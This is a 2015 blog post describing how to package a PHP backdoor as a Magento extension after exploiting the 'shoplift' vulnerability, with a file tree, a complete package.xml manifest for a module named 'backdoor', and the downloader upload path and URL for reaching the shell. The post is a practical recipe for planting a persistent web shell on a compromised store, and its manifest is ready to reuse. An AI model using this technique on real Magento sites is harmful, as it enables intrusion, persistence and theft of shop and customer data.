Artificial truth

The more you see, the less you believe.

[archives] [latest] | [homepage] | [atom/rss]

Writing a simple extension/backdoor for Magento
Sun 15 November 2015 — download

shoplift logo

I was exploiting the shoplift vulnerability on a Magento instance, and I was looking for a practical (as in easy and clean) way to get a shell. Of course, I could have chained CVE-2015-1398 and CVE-2015-1399 like Checkpoint did, but I was way too lazy.

Instead, I decided to write an extension module and to install it. Since the internet is full of either outdated or way, way, way, way too complex tutorials about how to write a simple fucking extension with a single stupid php file, here is a quick how-to:

I didn't want to read the url-rewriting code of magento, so I decided that my backdoor will be under the errors folder.

Write (or get) a php backdoor, and put it into an errors folder, create a package.xml file like this one, and put everything into a tar.gz file, like this:

$ tree 
.
├── errors
│   └── backdoor.php
└── package.xml

That's it, you have your module, you can now upload it on http://yourmagentoinstan.ce/downloader, and access your backdoor on http://yourmagentoinstan.ce/errors/backdoor.php.

<?xml version="1.0"?>
<package>
<name>backdoor</name>
<version>1.3.3.7</version>
<stability>devel</stability>
<licence>backdoor</licence>
<channel>community</channel>
<extends/>
<summary>Backdoor for magento</summary>
<description>Backdoor for magento</description>
<notes>backdoor</notes>
<authors>
    <author>
        <name>jvoisin</name>
        <user>jvoisin</user>
        <email>julien.voisin@dustri.org</email>
    </author>
</authors>
<date>2015-08-17</date>
<time>13:47:49</time>
<contents>
    <target name="mage">
        <dir>
            <dir name="errors">
                <file name="backdoor.php" hash="1296555a85143621a52b2573a5cae715"/>
            </dir>
        </dir>
    </target>
</contents>
<compatible/>
<dependencies>
    <required>
        <php>
            <min>5.2.0</min>
            <max>6.0.0</max>
        </php>
    </required>
</dependencies>
</package>

The hash tag is the md5sum of your file (here, backdoor.php).